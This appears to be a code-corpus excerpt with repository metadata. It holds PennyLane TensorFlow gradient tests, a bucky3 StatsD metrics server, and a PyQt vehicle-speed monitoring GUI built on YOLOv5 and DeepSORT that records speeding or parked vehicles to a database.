circuit(tf.constant(1.), np.pi, np.pi).numpy() assert np.allclose(c, [-1., -1.], atol=tol, rtol=0) def test_keywordarg_updated_in_multiple_calls(self, qubit_device_2_wires): """Tests that qnodes update keyword arguments in consecutive calls.""" def circuit(w, x=None): qml.RX(w, wires=[0]) qml.RX(x, wires=[1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)) circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf() c1 = circuit(tf.constant(0.1), x=tf.constant(0.)) c2 = circuit(tf.constant(0.1), x=np.pi) assert c1[1] != c2[1] def test_keywordarg_passes_through_classicalnode(self, qubit_device_2_wires, tol): """Tests that qnodes' keyword arguments pass through classical nodes.""" def circuit(w, x=None): qml.RX(w, wires=[0]) qml.RX(x, wires=[1]) return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)) circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf() def classnode(w, x=None): return circuit(w, x=x) c = classnode(tf.constant(0.), x=np.pi) assert np.allclose(c.numpy(), [1., -1.], atol=tol, rtol=0) def test_keywordarg_gradient(self, qubit_device_2_wires, tol): """Tests that qnodes' keyword arguments work with gradients""" def circuit(x, y, input_state=np.array([0, 0])): qml.BasisState(input_state, wires=[0, 1]) qml.RX(x, wires=[0]) qml.RY(y, wires=[0]) return qml.expval(qml.PauliZ(0)) circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf() x = 0.543 y = 0.45632 expected_grad = np.array([np.sin(x)*np.cos(y), np.sin(y)*np.cos(x)]) x_t = Variable(x) y_t = Variable(y) # test first basis state against analytic result with tf.GradientTape() as tape: c = circuit(x_t, y_t, input_state=np.array([0, 0])) grads = np.array(tape.gradient(c, [x_t, y_t])) assert np.allclose(grads, -expected_grad, atol=tol, rtol=0) # test third basis state against analytic result with tf.GradientTape() as tape: c = circuit(x_t, y_t, input_state=np.array([1, 0])) grads = np.array(tape.gradient(c, [x_t, y_t])) assert np.allclose(grads, expected_grad, atol=tol, rtol=0) # test first basis state via the default keyword argument against analytic result with tf.GradientTape() as tape: c = circuit(x_t, y_t) grads = np.array(tape.gradient(c, [x_t, y_t])) assert np.allclose(grads, -expected_grad, atol=tol, rtol=0) @pytest.mark.usefixtures("skip_if_no_tf_support") class TestIntegration: """Integration tests to ensure the TensorFlow QNode agrees with the NumPy QNode""" def test_qnode_evaluation_agrees(self, qubit_device_2_wires, tol): """Tests that simple example is consistent.""" @qml.qnode(qubit_device_2_wires, interface='autograd') def circuit(phi, theta): qml.RX(phi[0], wires=0) qml.RY(phi[1], wires=1) qml.CNOT(wires=[0, 1]) qml.PhaseShift(theta[0], wires=0) return qml.expval(qml.PauliZ(0)) @qml.qnode(qubit_device_2_wires, interface='tf') def circuit_tf(phi, theta): qml.RX(phi[0], wires=0) qml.RY(phi[1], wires=1) qml.CNOT(wires=[0, 1]) qml.PhaseShift(theta[0], wires=0) return qml.expval(qml.PauliZ(0)) phi = [0.5, 0.1] theta = [0.2] phi_t = Variable(phi) theta_t = Variable(theta) autograd_eval = circuit(phi, theta) tf_eval = circuit_tf(phi_t, theta_t) assert np.allclose(autograd_eval, tf_eval.numpy(), atol=tol, rtol=0) def test_qnode_gradient_agrees(self, qubit_device_2_wires, tol): """Tests that simple gradient example is consistent.""" @qml.qnode(qubit_device_2_wires, interface='autograd') def circuit(phi, theta): qml.RX(phi[0], wires=0) qml.RY(phi[1], wires=1) qml.CNOT(wires=[0, 1]) qml.PhaseShift(theta[0], wires=0) return qml.expval(qml.PauliZ(0)) @qml.qnode(qubit_device_2_wires, interface='tf') def circuit_tf(phi, theta): qml.RX(phi[0], wires=0) qml.RY(phi[1], wires=1) qml.CNOT(wires=[0, 1]) qml.PhaseShift(theta[0], wires=0) return qml.expval(qml.PauliZ(0)) phi = [0.5, 0.1] theta = [0.2] phi_t = Variable(phi) theta_t = Variable(theta) dcircuit = qml.grad(circuit, [0, 1]) autograd_grad = dcircuit(phi, theta) with tf.GradientTape() as g: g.watch([phi_t, theta_t]) y = circuit_tf(phi_t, theta_t) tf_grad = g.gradient(y, [phi_t, theta_t]) assert np.allclose(autograd_grad[0], tf_grad[0], atol=tol, rtol=0) assert np.allclose(autograd_grad[1], tf_grad[1], atol=tol, rtol=0) gradient_test_data = [ (0.5, -0.1), (0.0, np.pi), (-3.6, -3.6), (1.0, 2.5), ] @pytest.mark.usefixtures("skip_if_no_tf_support") class TestTFGradients: """Integration tests involving gradients of QNodes and hybrid computations using the tf interface""" @pytest.fixture def qnodes(self): """Two QNodes to be used for the gradient tests""" dev = qml.device("default.qubit", wires=2) @qml.qnode(dev, interface="tf") def f(x): qml.RX(x, wires=0) return qml.expval(qml.PauliZ(0)) @qml.qnode(dev, interface="tf") def g(y): qml.RY(y, wires=0) return qml.expval(qml.PauliX(0)) return f, g @pytest.mark.parametrize("x, y", gradient_test_data) def test_addition_qnodes_gradient(self, qnodes, x, y): """Test the gradient of addition of two QNode circuits""" f, g = qnodes def add(a, b): return a + b xt = Variable(x) yt = Variable(y) # addition with tf.GradientTape() as tape: tape.watch([xt, yt]) a = f(xt) b = g(yt) y = add(a, b) grad = tape.gradient(y, [a, b]) assert grad[0].numpy() == 1.0 assert grad[1].numpy() == 1.0 # same tensor added to itself with tf.GradientTape() as tape: tape.watch([xt, yt]) a = f(xt) y = add(a, a) grad = tape.gradient(y, [a, a]) assert grad[0].numpy() == 2.0 assert grad[1].numpy() == 2.0 # different qnodes with same input parameter added together with tf.GradientTape() as tape: tape.watch([xt, yt]) a = f(xt) b = g(xt) y = add(a, b) grad = tape.gradient(y, [a, b]) assert grad[0].numpy() == 1.0 assert grad[1].numpy() == 1.0 @pytest.mark.parametrize("x, y", gradient_test_data) def test_subtraction_qnodes_gradient(self, qnodes, x, y): """Test the gradient of subtraction of two QNode circuits""" f, g = qnodes def subtract(a, b): return a - b xt = Variable(x) yt = Variable(y) # subtraction with tf.GradientTape() as tape: tape.watch([xt, yt]) a = f(xt) b = g(yt) y = subtract(a, b) grad = tape.gradient(y, [a, b]) assert grad[0].numpy() == 1.0 assert grad[1].numpy() == -1.0 @pytest.mark.parametrize("x, y", gradient_test_data) def test_multiplication_qnodes_gradient(self, qnodes, x, y): """Test the gradient of multiplication of two QNode circuits""" f, g = qnodes def mult(a, b): return a * b xt = Variable(x) yt = Variable(y) # multiplication with tf.GradientTape() as tape: tape.watch([xt, yt]) a = f(xt) b = g(yt) y = mult(a, b) grad = tape.gradient(y, [a, b]) assert grad[0].numpy() == b.numpy() assert grad[1].numpy() == a.numpy() @pytest.mark.parametrize("x, y", gradient_test_data) def test_division_qnodes_gradient(self, qnodes, x, y, tol): """Test the gradient of division of two QNode circuits""" f, g = qnodes def div(a, b): return a / b xt = Variable(x) yt = Variable(y) # division with tf.GradientTape() as tape: tape.watch([xt, yt]) a = f(xt) b = g(yt) y = div(a, b) grad = tape.gradient(y, [a, b]) assert grad[0].numpy() == 1 / b.numpy() assert np.allclose(grad[1].numpy(), -a.numpy() / b.numpy() ** 2, atol=tol, rtol=0) @pytest.mark.parametrize("x, y", gradient_test_data) def test_composition_qnodes_gradient(self, qnodes, x, y): """Test the gradient of composition of two QNode circuits""" f, g = qnodes xt = Variable(x) yt = Variable(y) # compose function with xt as input with tf.GradientTape() as tape: tape.watch([xt]) y = f(xt) grad1 = tape.gradient(y, xt) with tf.GradientTape() as tape: tape.watch([xt]) y = f(xt) grad2 = tape.gradient(y, xt) assert tf.equal(grad1, grad2) # compose function with a as input with tf.GradientTape() as tape: tape.watch([xt]) a = f(xt) y = f(a) grad1 = tape.gradient(y, a) with tf.GradientTape() as tape: tape.watch([xt]) a = f(xt) y = f(a) grad2 = tape.gradient(y, a) assert tf.equal(grad1, grad2) # compose function with b as input with tf.GradientTape() as tape: tape.watch([xt]) b = g(xt) y = g(b) grad1 = tape.gradient(y, b) with tf.GradientTape() as tape: tape.watch([xt]) b = g(xt) y = g(b) grad2 = tape.gradient(y, b) assert tf.equal(grad1, grad2)
35.994444
115
0.587861
de653c89ff97f8f9124be9ca82bdbb3f191e90bb
13,244
py
Python
bucky3/statsd.py
smarkets/bucky3
7bca15c28d3e55027b831923c43a811da9d62ecb
[ "Apache-2.0" ]
null
null
null
bucky3/statsd.py
smarkets/bucky3
7bca15c28d3e55027b831923c43a811da9d62ecb
[ "Apache-2.0" ]
null
null
null
bucky3/statsd.py
smarkets/bucky3
7bca15c28d3e55027b831923c43a811da9d62ecb
[ "Apache-2.0" ]
1
2022-03-26T12:11:29.000Z
2022-03-26T12:11:29.000Z
# -*- coding: utf-8 - # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of # the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. # # Copyright 2011 Cloudant, Inc. import time import socket import threading import bucky3.module as module class StatsDServer(module.MetricsSrcProcess, module.UDPConnector): def __init__(self, *args): super().__init__(*args) self.sock = None self.timers = {} self.timers_lock = threading.Lock() self.histograms = {} self.histograms_lock = threading.Lock() self.gauges = {} self.gauges_lock = threading.Lock() self.counters = {} self.counters_lock = threading.Lock() self.sets = {} self.sets_lock = threading.Lock() self.last_timestamp = 0 self.metrics_received = 0 def flush(self, system_timestamp): self.enqueue_timers(system_timestamp) self.enqueue_histograms(system_timestamp) self.enqueue_counters(system_timestamp) self.enqueue_gauges(system_timestamp) self.enqueue_sets(system_timestamp) self.last_timestamp = system_timestamp return super().flush(system_timestamp) def init_cfg(self): super().init_cfg() percentile_thresholds = self.cfg.get('percentile_thresholds', ()) self.percentile_thresholds = sorted(set(round(float(t), 2) for t in percentile_thresholds if t > 0 and t <= 100)) self.histogram_selector = self.cfg.get('histogram_selector') self.timestamp_window = self.cfg.get('timestamp_window', 600) def read_loop(self): sock = self.open_socket(bind=True) self.last_timestamp = round(time.time(), 3) while True: try: data, addr = sock.recvfrom(65535) self.handle_packet(data, addr) except (InterruptedError, socket.timeout): pass def loop(self): self.start_thread('UdpReadThread', self.read_loop) super().loop() def produce_self_report(self): self_report = super().produce_self_report() self_report['metrics_received'] = self.metrics_received return self_report def enqueue_timers(self, system_timestamp): interval = system_timestamp - self.last_timestamp bucket = self.cfg['timers_bucket'] timestamp = system_timestamp if self.add_timestamps else None with self.timers_lock: for k, (cust_timestamp, v) in self.timers.items(): v.sort() count = len(v) thresholds = ((count if t == 100 else (t * count) // 100, t) for t in self.percentile_thresholds) try: next_i, next_t = next(thresholds) vlen = vsum = vsum_squares = 0 for i, x in enumerate(v): vlen += 1 vsum += x vsum_squares += x * x while i >= next_i - 1: mean = vsum / vlen stats = {'count': vlen, 'count_ps': vlen / interval, 'lower': v[0], 'upper': x, 'mean': mean} if vlen > 1: var = (vsum_squares - 2 * mean * vsum + vlen * mean * mean) / (vlen - 1) # FP rounding can lead to negative variance and in consequence complex stdev. # I.e. three samples of [0.003, 0.003, 0.003] var = max(var, 0) stats['stdev'] = var ** 0.5 metadata = {'percentile': str(next_t)} metadata.update(k) self.buffer_metric(bucket, stats, cust_timestamp or timestamp, metadata) next_i, next_t = next(thresholds) except StopIteration: pass self.timers = {} def enqueue_histograms(self, system_timestamp): interval = system_timestamp - self.last_timestamp bucket = self.cfg['histograms_bucket'] timestamp = system_timestamp if self.add_timestamps else None with self.histograms_lock: for k, (cust_timestamp, selector, buckets) in self.histograms.items(): for histogram_bucket, (vlen, vsum, vsum_squares, vmin, vmax) in buckets.items(): mean = vsum / vlen stats = {'count': vlen, 'count_ps': vlen / interval, 'lower': vmin, 'upper': vmax, 'mean': mean} if vlen > 1: var = (vsum_squares - 2 * mean * vsum + vlen * mean * mean) / (vlen - 1) var = max(var, 0) stats['stdev'] = var ** 0.5 metadata = {'histogram': str(histogram_bucket)} metadata.update(k) self.buffer_metric(bucket, stats, cust_timestamp or timestamp, metadata) self.histograms = {} def enqueue_sets(self, system_timestamp): bucket = self.cfg['sets_bucket'] timestamp = system_timestamp if self.add_timestamps else None with self.sets_lock: for k, (cust_timestamp, v) in self.sets.items(): self.buffer_metric(bucket, {"count": len(v)}, cust_timestamp or timestamp, dict(k)) self.sets = {} def enqueue_gauges(self, system_timestamp): bucket = self.cfg['gauges_bucket'] timestamp = system_timestamp if self.add_timestamps else None with self.gauges_lock: for k, (cust_timestamp, v) in self.gauges.items(): self.buffer_metric(bucket, {"value": float(v)}, cust_timestamp or timestamp, dict(k)) self.gauges = {} def enqueue_counters(self, system_timestamp): interval = system_timestamp - self.last_timestamp bucket = self.cfg['counters_bucket'] timestamp = system_timestamp if self.add_timestamps else None with self.counters_lock: for k, (cust_timestamp, v) in self.counters.items(): stats = { 'rate': float(v) / interval, 'count': float(v) } self.buffer_metric(bucket, stats, cust_timestamp or timestamp, dict(k)) self.counters = {} def handle_packet(self, data, addr=None): # Adding a bit of extra sauce so clients can send multiple samples in a single UDP packet. try: recv_timestamp, data = round(time.time(), 3), data.decode("ascii") except UnicodeDecodeError: return for line in data.splitlines(): line = line.strip() if line: self.handle_line(recv_timestamp, line) def handle_line(self, recv_timestamp, line): # DataDog special packets for service check and events, ignore them if line.startswith('sc|') or line.startswith('_e{'): return try: cust_timestamp, line, metadata = self.handle_metadata(recv_timestamp, line) except ValueError: return if not line: return bits = line.split(":") if len(bits) < 2: return name = bits.pop(0) if not name.isidentifier(): return key, metadata = self.handle_key(name, metadata) if not key: return # I'm not sure if statsd is doing this on purpose but the code allows for name:v1|t1:v2|t2 etc. # In the interest of compatibility, I'll maintain the behavior. for sample in bits: if "|" not in sample: continue fields = sample.split("|") valstr = fields[0] if not valstr: continue typestr = fields[1] ratestr = fields[2] if len(fields) > 2 else None try: if typestr == "ms" or typestr == "h": self.handle_timer(cust_timestamp, key, metadata, valstr, ratestr) elif typestr == "g": self.handle_gauge(cust_timestamp, key, metadata, valstr, ratestr) elif typestr == "s": self.handle_set(cust_timestamp, key, metadata, valstr, ratestr) else: self.handle_counter(cust_timestamp, key, metadata, valstr, ratestr) self.metrics_received += 1 except ValueError: pass def handle_metadata(self, recv_timestamp, line): # http://docs.datadoghq.com/guides/dogstatsd/#datagram-format bits = line.split("|#", 1) # We allow '#' in tag values, too cust_timestamp, metadata = None, {} if len(bits) < 2: return cust_timestamp, line, metadata for i in bits[1].split(","): if not i: continue # Due to how we parse the metadata, comma is the only illegal character # in tag values, everything else will be taken literally. # Prometheus and Influx modules handle escaping the special chars as needed. # There is no special char handling in carbon module at all, i.e. it is flawed. k, _, v = i.partition('=') if not k.isidentifier() or not v: raise ValueError() if k == 'timestamp': cust_timestamp = float(v) # Assume millis not secs if the timestamp >= 2^31 if cust_timestamp > 2147483647: cust_timestamp /= 1000 if abs(recv_timestamp - cust_timestamp) > self.timestamp_window: raise ValueError() cust_timestamp = round(cust_timestamp, 3) elif k == 'bucket': if not v.isidentifier(): raise ValueError() metadata[k] = v else: metadata[k] = v return cust_timestamp, bits[0], metadata def handle_key(self, name, metadata): metadata.update(name=name) key = tuple((k, metadata[k]) for k in sorted(metadata.keys())) return key, metadata def handle_timer(self, cust_timestamp, key, metadata, valstr, ratestr): val = float(valstr) with self.timers_lock: if key in self.timers: buf = self.timers[key][1] buf.append(val) self.timers[key] = cust_timestamp, buf else: self.timers[key] = cust_timestamp, [val] if self.histogram_selector is None: return with self.histograms_lock: histogram = self.histograms.get(key) if histogram is None: selector = self.histogram_selector(metadata) if selector is None: return buckets = {} else: selector = histogram[1] buckets = histogram[2] bucket_name = selector(val) if bucket_name: bucket_stats = buckets.get(bucket_name) if bucket_stats: vlen, vsum, vsum_squares, vmin, vmax = bucket_stats else: vlen = vsum = vsum_squares = 0 vmin = vmax = val buckets[bucket_name] = ( vlen + 1, vsum + val, vsum_squares + val * val, min(val, vmin), max(val, vmax) ) self.histograms[key] = cust_timestamp, selector, buckets def handle_gauge(self, cust_timestamp, key, metadata, valstr, ratestr): val = float(valstr) delta = valstr[0] in "+-" with self.gauges_lock: if delta and key in self.gauges: self.gauges[key] = cust_timestamp, self.gauges[key][1] + val else: self.gauges[key] = cust_timestamp, val def handle_set(self, cust_timestamp, key, metadata, valstr, ratestr): with self.sets_lock: if key in self.sets: buf = self.sets[key][1] buf.add(valstr) self.sets[key] = cust_timestamp, buf else: self.sets[key] = cust_timestamp, {valstr} def handle_counter(self, cust_timestamp, key, metadata, valstr, ratestr): if ratestr and ratestr[0] == "@": rate = float(ratestr[1:]) if rate > 0 and rate <= 1: val = float(valstr) / rate else: return else: val = float(valstr) with self.counters_lock: if key in self.counters: val += self.counters[key][1] self.counters[key] = cust_timestamp, val
41.77918
121
0.553609
0824afd7e96bf3bf971d3da7c2e93bad5d917fea
16,720
py
Python
GUI/Monitoring.py
kyvipro113/Speed_Monitoring_System
3ce877c87644bfe20a1d59f3cd6c0435c772e5c5
[ "MIT" ]
null
null
null
GUI/Monitoring.py
kyvipro113/Speed_Monitoring_System
3ce877c87644bfe20a1d59f3cd6c0435c772e5c5
[ "MIT" ]
null
null
null
GUI/Monitoring.py
kyvipro113/Speed_Monitoring_System
3ce877c87644bfe20a1d59f3cd6c0435c772e5c5
[ "MIT" ]
null
null
null
from PyQt5.QtWidgets import QFrame from GUI.Ui_Monitoring import Ui_Monitoring from PyQt5 import QtWidgets from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread, Qt, pyqtSlot from PyQt5.QtGui import QImage, QPixmap from PyQt5.QtWidgets import QFileDialog import cv2 from pathlib import Path import os.path import numpy as np import time import sys sys.path.insert(0, './yolov5') from yolov5.models.experimental import attempt_load from yolov5.utils.datasets import LoadImages, LoadStreams from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords, check_imshow from yolov5.utils.torch_utils import select_device from deep_sort_pytorch.utils.parser import get_config from deep_sort_pytorch.deep_sort import DeepSort import os from pathlib import Path import cv2 import torch import torch.backends.cudnn as cudnn import math from SQL_Connection.SQLConnection import SQLConnection import datetime path_save_violating_vehicle = "violating_vehicle/" if not (os.path.isdir("violating_vehicle")): os.mkdir("violating_vehicle") violation_time = {} SQL = SQLConnection() palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1) pixels_per_meter = 1 fps = 0 fileName = "" videoFile = "" carStartPosition = {} carCurrentPosition = {} speed = {} violating_vehicle = {} violating_name = {} def bbox_rel(*xyxy): bbox_left = min([xyxy[0].item(), xyxy[2].item()]) bbox_top = min([xyxy[1].item(), xyxy[3].item()]) bbox_w = abs(xyxy[0].item() - xyxy[2].item()) bbox_h = abs(xyxy[1].item() - xyxy[3].item()) x_c = (bbox_left + bbox_w / 2) y_c = (bbox_top + bbox_h / 2) w = bbox_w h = bbox_h return x_c, y_c, w, h def compute_color_for_labels(label): color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette] return tuple(color) def draw_boxes(img, bbox, identities=None, speed = {}, offset=(0, 0)): for i, box in enumerate(bbox): x1, y1, x2, y2 = [int(i) for i in box] x1 += offset[0] x2 += offset[0] y1 += offset[1] y2 += offset[1] # box text and bar id = int(identities[i]) if identities is not None else 0 color = compute_color_for_labels(id) label = '{}{:d}'.format("", id) t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0] cv2.rectangle(img, (x1, y1), (x2, y2), color, 3) cv2.rectangle( img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1) cv2.putText(img, label, (x1, y1 + t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2) if not (speed == {}): if id in speed: cv2.putText(img, str(speed[id]) + "km/h", (x1 + 30, y1 + t_size[1] + 20), cv2.FONT_HERSHEY_PLAIN, 4, [255, 255, 255], 2) return img flag = False def calculate_speed(startPosition, currentPosition, fps): global pixels_per_meter xG_start, yG_start = (startPosition[0] + startPosition[2]) / 2, (startPosition[1] + startPosition[3]) / 2 xG_current, yG_current = (currentPosition[0] + currentPosition[2]) / 2, (currentPosition[1] + currentPosition[3]) / 2 distance_in_pixels = math.sqrt(math.pow(xG_current - xG_start, 2) + math.pow(yG_current - yG_start, 2)) distance_in_meters = distance_in_pixels / pixels_per_meter speed_in_meter_per_second = distance_in_meters * fps speed_in_kilometer_per_hour = speed_in_meter_per_second * 3.6 if not speed == {}: for id in carCurrentPosition.keys(): if id in speed: if(speed[id] < 30 or speed[id] > 150): if id not in violating_vehicle: violating_vehicle[id] = carCurrentPosition[id] violation_time[id] = datetime.datetime.now() if(speed[id] == 0): violating_name[id] = "Parking" if(speed[id] < 30 and speed[id] > 0): violating_name[id] = "Under Speed" if(speed[id] > 150): violating_name[id] = "Over Speed" if(yG_start > 500 and yG_current < 50): violating_name[id] = "Opposite Lane" return speed_in_kilometer_per_hour def cleanDictSpeed(): global speed global carStartPosition global carCurrentPosition speed.clear() carStartPosition.clear() carCurrentPosition.clear() violating_vehicle.clear() class ThreadMonitoring(QThread): # Using thread for real-time detect and tracking changePixmap = pyqtSignal(QImage) def __init__(self, path = 0, parent=None): QThread.__init__(self, parent=parent) self.vid_src = path def setPath(self, path): self.vid_src = path def run(self): global carStartPosition global carCurrentPosition out, source, weights, view_vid, save_vid, imgsz = "output", self.vid_src, "yolov5/weights/yolov5s.pt", True, True, 640 webcam = source == '0' or source.startswith('rtsp') or source.startswith('http') or source.endswith('.txt') # initialize deepsort cfg = get_config() cfg.merge_from_file('deep_sort_pytorch/configs/deep_sort.yaml') deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT, max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE, nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE, max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET, use_cuda=True) # Initialize device = select_device('') # Default CUDA half = device.type != 'cpu' # half precision only supported on CUDA # Load model model = attempt_load(weights, map_location=device) # load FP32 model stride = int(model.stride.max()) # model stride imgsz = check_img_size(imgsz, s=stride) # check img_size if half: model.half() # to FP16 print(device.type) # Set Dataloader vid_writer, vid_path = None, None # Check if environment supports image displays if view_vid: view_vid = check_imshow() if webcam: cudnn.benchmark = True # set True to speed up constant image size inference dataset = LoadStreams(source, img_size=imgsz, stride=stride) else: dataset = LoadImages(source, img_size=imgsz) # Run inference if device.type != 'cpu': model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once save_path = str(Path(out)) # Count frame count_frame = 0 start_time = 0 end_time = 0 while(flag): for frame_idx, (path, img, im0s, vid_cap) in enumerate(dataset): start_time = time.time() img = torch.from_numpy(img).to(device) img = img.half() if half else img.float() # uint8 to fp16/32 img /= 255.0 # 0 - 255 to 0.0 - 1.0 if not flag: break if img.ndimension() == 3: img = img.unsqueeze(0) if(frame_idx >=5): count_frame += 1 # Inference pred = model(img, augment='')[0] # Apply NMS pred = non_max_suppression(pred, 0.4, 0.5, classes=[2, 5, 6], agnostic=False) # Process detections for i, det in enumerate(pred): # detections per image if webcam: # batch_size >= 1 p, s, im0 = path[i], '%g: ' % i, im0s[i].copy() else: p, s, im0 = path, '', im0s save_path = str(Path(out) / Path(videoFile)) if det is not None and len(det): # Rescale boxes from img_size to im0 size det[:, :4] = scale_coords( img.shape[2:], det[:, :4], im0.shape).round() bbox_xywh = [] confs = [] # Adapt detections to deep sort input format for *xyxy, conf, cls in det: x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy) obj = [x_c, y_c, bbox_w, bbox_h] bbox_xywh.append(obj) if conf.item() > 0.55: confs.append([conf.item()]) xywhs = torch.Tensor(bbox_xywh) confss = torch.Tensor(confs) # Pass detections to deepsort outputs = deepsort.update(xywhs, confss, im0) end_time = time.time() # Calculate FPS if not (start_time == end_time): fps = 1.0/ (end_time - start_time) # draw boxes for visualization if len(outputs) > 0: bbox_xyxy = outputs[:, :4] identities = outputs[:, -1] # Calculate speed if(count_frame == 1): car_ID = outputs[:, 4] post_car = outputs[:, [0, 1, 2, 3]] for ID in car_ID: post = np.where(car_ID == ID) carStartPosition[ID] = post_car[int(post[0]), :].tolist() if(count_frame == 2): car_ID = outputs[:, 4] post_car = outputs[:, [0, 1, 2, 3]] for ID in car_ID: post = np.where(car_ID == ID) carCurrentPosition[ID] = post_car[int(post[0]), :].tolist() for ID in carStartPosition.keys(): if(ID in carStartPosition and ID in carCurrentPosition): [x_s1, y_s1, x_s2, y_s2] = carStartPosition[ID] [x_c1, y_c1, x_c2, y_c2] = carCurrentPosition[ID] #carStartPosition[ID] = [x_c1, y_c1, x_c2, y_c2] if ID not in speed: speed_car = calculate_speed([x_s1, y_s1, x_s2, y_s2], [x_c1, y_c1, x_c2, y_c2], fps=fps) speed[ID] = int(speed_car) count_frame = 0 for id in violating_vehicle.keys(): img_crop = im0[violating_vehicle[id][1]:violating_vehicle[id][3], violating_vehicle[id][0]:violating_vehicle[id][2]] if(img_crop.shape[0] > 0 and img_crop.shape[1]>0): if not os.path.isfile(path_save_violating_vehicle + "{}.{}.jpg".format(fileName, id)): cv2.imwrite(path_save_violating_vehicle + "{}.{}.jpg".format(fileName, id), img_crop) imgFile = fileName + "." + str(id) + "." + "jpg" sp = "{} km/h".format(speed[id]) SQL.queryNoReturn("Insert Into ViolatingVehicle Values ('{}', '{}', '{}', '{}', '{}')".format(id, sp, violating_name[id], violation_time[id], imgFile)) draw_boxes(im0, bbox_xyxy, identities, speed=speed) else: deepsort.increment_ages() # Stream results if view_vid: im0S = cv2.resize(im0, (850, 480)) rgbImage = cv2.cvtColor(im0S, cv2.COLOR_BGR2RGB) h, w, ch = rgbImage.shape bytesPerLine = ch * w convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888) p = convertToQtFormat.scaled(850, 480, Qt.KeepAspectRatio) self.changePixmap.emit(p) if save_vid: if vid_path != save_path: # new video vid_path = save_path if isinstance(vid_writer, cv2.VideoWriter): vid_writer.release() # release previous video writer if vid_cap: # video fps = vid_cap.get(cv2.CAP_PROP_FPS) w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH)) h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) else: # stream fps, w, h = 30, im0.shape[1], im0.shape[0] print(save_path) save_path += '.mp4' vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h)) print(save_path) vid_writer.write(im0) class Monitoring(QFrame, Ui_Monitoring): def __init__(self, parent=None): QFrame.__init__(self, parent=parent) self.setupUi(self) self.comboInput.addItem("Video") self.comboInput.addItem("Camera") self.txtPPM.setText("1") self.btEnd.setEnabled(False) self.path = None # Monitoring Video Thread self.threadMonitoring = ThreadMonitoring(self) self.threadMonitoring.changePixmap.connect(self.setImage) # Event self.btChooseVideo.clicked.connect(self.chooseVideo) self.btStart.clicked.connect(self.startMonitoring) self.btEnd.clicked.connect(self.endMonitoring) @pyqtSlot(QImage) def setImage(self, image): self.lbImg.setPixmap(QPixmap.fromImage(image)) def alert(self, title, message): msg = QtWidgets.QMessageBox() msg.setIcon(QtWidgets.QMessageBox.Information) msg.setText(message) msg.setWindowTitle(title) msg.exec_() def chooseVideo(self): #Show file dialog global fileName global videoFile try: options = QFileDialog.Options() options |= QFileDialog.DontUseNativeDialog video_path, _ = QFileDialog.getOpenFileName(None, "Choose Video", "","Video Files (*.mp4 *.avi);;All Files (*)", options = options) if video_path is not None: self.path = video_path fileName = Path(video_path).resolve().stem fileTail = os.path.splitext(video_path)[-1] videoFile = fileName + fileTail self.lbNameVideo.setText(videoFile) except: pass def startMonitoring(self): global flag global pixels_per_meter global fileName global videoFile if not self.txtPPM.text() == "": if(float(self.txtPPM.text()) > 0): pixels_per_meter = float(self.txtPPM.text()) #print(pixels_per_meter) else: self.alert(title="Cảnh báo", message="Pixel trên met phải lớn hơn 0, \n Hệ thống sẽ cài đặt mặc định") else: pixels_per_meter = 1 if(self.comboInput.currentText() == "Camera"): if not flag: fileName = "webcam0" videoFile = "Webcam0.mp4" flag = True self.threadMonitoring.setPath(path="0") self.threadMonitoring.start() if(self.path is None and self.comboInput.currentText() == "Video"): self.alert(title="Cảnh báo", message="Không có vide được chọn!") else: if not flag: self.btStart.setEnabled(False) self.btEnd.setEnabled(True) flag = True self.threadMonitoring.setPath(path=self.path) self.threadMonitoring.start() def endMonitoring(self): global flag if flag: flag = False self.threadMonitoring.exit() self.btEnd.setEnabled(False) self.btStart.setEnabled(True) if not flag: cleanDictSpeed()
41.8
191
0.527811
984e1b1e356b23b0ce904f5c8ff3909af6b45cb4
8,684
py
Python
venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py
haind27/test01
7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852
[ "MIT" ]
37
2017-08-15T15:02:43.000Z
2021-07-23T03:44:31.000Z
venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py
haind27/test01
7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852
[ "MIT" ]
12
2018-01-10T05:25:25.000Z
2021-11-28T06:55:48.000Z
venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py
haind27/test01
7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852
[ "MIT" ]
49
2017-08-15T09:52:13.000Z
2022-03-21T17:11:54.000Z
